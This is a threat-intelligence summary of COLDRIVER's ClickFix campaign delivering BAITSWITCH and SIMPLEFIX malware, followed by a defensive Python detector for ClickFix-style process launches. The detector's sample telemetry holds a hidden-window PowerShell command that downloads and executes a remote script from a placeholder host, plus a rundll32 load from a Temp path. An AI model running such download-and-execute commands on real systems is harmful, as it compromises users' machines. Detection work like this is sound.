The Russia-linked APT group COLDRIVER has launched a new series of ClickFix-style attacks that deliver the BAITSWITCH and SIMPLEFIX malware families. The campaigns target Russian civil society and rely on a multi-stage infection chain in which the victim, not an exploit, runs the first stage. #COLDRIVER #ClickFix #BAITSWITCH #SIMPLEFIX
Key points
- COLDRIVER is a Russia-linked APT that has targeted NGOs, human rights groups, and exiles since 2019.
- The new attack chain opens with a fake CAPTCHA page that talks the user into running a command themselves; that command loads a malicious DLL (BAITSWITCH), which in turn retrieves the SIMPLEFIX PowerShell backdoor.
- SIMPLEFIX communicates with its C2 server to fetch and run operator commands and to exfiltrate data from the infected host.
- Zscaler notes that ClickFix is neither new nor technically advanced, yet it keeps working: because the victim pastes and executes the command, there is no exploit for patching or exploit-prevention controls to stop.
- Separate campaigns by other groups, BO Team and Bearlyfy, have hit Russian companies with unrelated tooling, including ZeronetKit and ransomware.
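ClickFix lures of the kind described above typically have the victim press Win+R and paste a command into the Run dialog, so the resulting process tree has explorer.exe as the parent of an interpreter or LOLBin (powershell.exe, rundll32.exe, mshta.exe) with a command line that fetches or stages content. The following Python is an added example, not code from the article or from Zscaler, that applies that heuristic to process-creation telemetry. The record fields, the sample events, the hostnames and the file paths are all constructed for the example; the indicator regexes are generic and are not claimed to match COLDRIVER's actual commands.

```python
"""
Heuristic ClickFix detection over process-creation telemetry (added example).

Pattern: explorer.exe (which hosts the Win+R Run dialog) spawns a LOLBin whose
command line pulls remote content, hides its window, or loads a DLL from a
user-writable path. Field names and sample data are constructed, not real.
"""
import ntpath
import re
from dataclasses import dataclass

# Binaries a ClickFix lure commonly has the victim launch from the Run dialog.
RUN_DIALOG_CHILDREN = {
    "powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe",
    "cmd.exe", "curl.exe", "msiexec.exe",
}

# Command-line traits that separate a lure from a user simply opening a shell.
SUSPICIOUS_CMDLINE = {
    "remote URL in command line": re.compile(r"https?://", re.I),
    "encoded PowerShell": re.compile(r"-(?:e|enc|encodedcommand)\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "download/eval cmdlet": re.compile(
        r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b", re.I),
    "DLL loaded from user-writable path": re.compile(
        r"rundll32(?:\.exe)?\s+\S*(?:\\temp\\|\\appdata\\|\\public\\|\\downloads\\)", re.I),
}


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed schema, e.g. from Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str


def clickfix_indicators(ev: ProcEvent) -> list[str]:
    """Return the indicator names that fire for this event, or [] if it is not a ClickFix candidate."""
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    # Both conditions are required: the Run-dialog parent and a LOLBin child.
    if parent != "explorer.exe" or child not in RUN_DIALOG_CHILDREN:
        return []
    return [name for name, pat in SUSPICIOUS_CMDLINE.items() if pat.search(ev.command_line)]


def scan(events: list[ProcEvent]) -> list[tuple[int, str, list[str]]]:
    """Return (event index, child image name, indicators) for every event that matches."""
    hits = []
    for i, ev in enumerate(events):
        reasons = clickfix_indicators(ev)
        if reasons:
            hits.append((i, ntpath.basename(ev.image).lower(), reasons))
    return hits


# Constructed sample telemetry: two benign launches, two lure-style launches,
# and one suspicious PowerShell that is NOT the Run-dialog pattern.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),  # user opened a shell; no indicators
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iex (iwr http://captcha.example.invalid/verify.ps1 -UseBasicParsing)"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\check.dll,Start"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -enc SQBFAFgA"),  # mail-borne, a different detection's job
]


def main() -> None:
    for idx, image, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {image}: {', '.join(reasons)}")


if __name__ == "__main__":
    main()
```

The parent check is deliberately strict: a PowerShell launched by Outlook or a browser is worth alerting on too, but through a separate rule, so that this one stays a high-precision signal for the paste-into-Run behaviour ClickFix depends on. Tune the child set and the command-line regexes to your environment; the "DLL from user-writable path" indicator will flag some legitimate installers and should be reviewed with that in mind.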
Read More: https://thehackernews.com/2025/09/new-coldriver-malware-campaign-joins-bo.html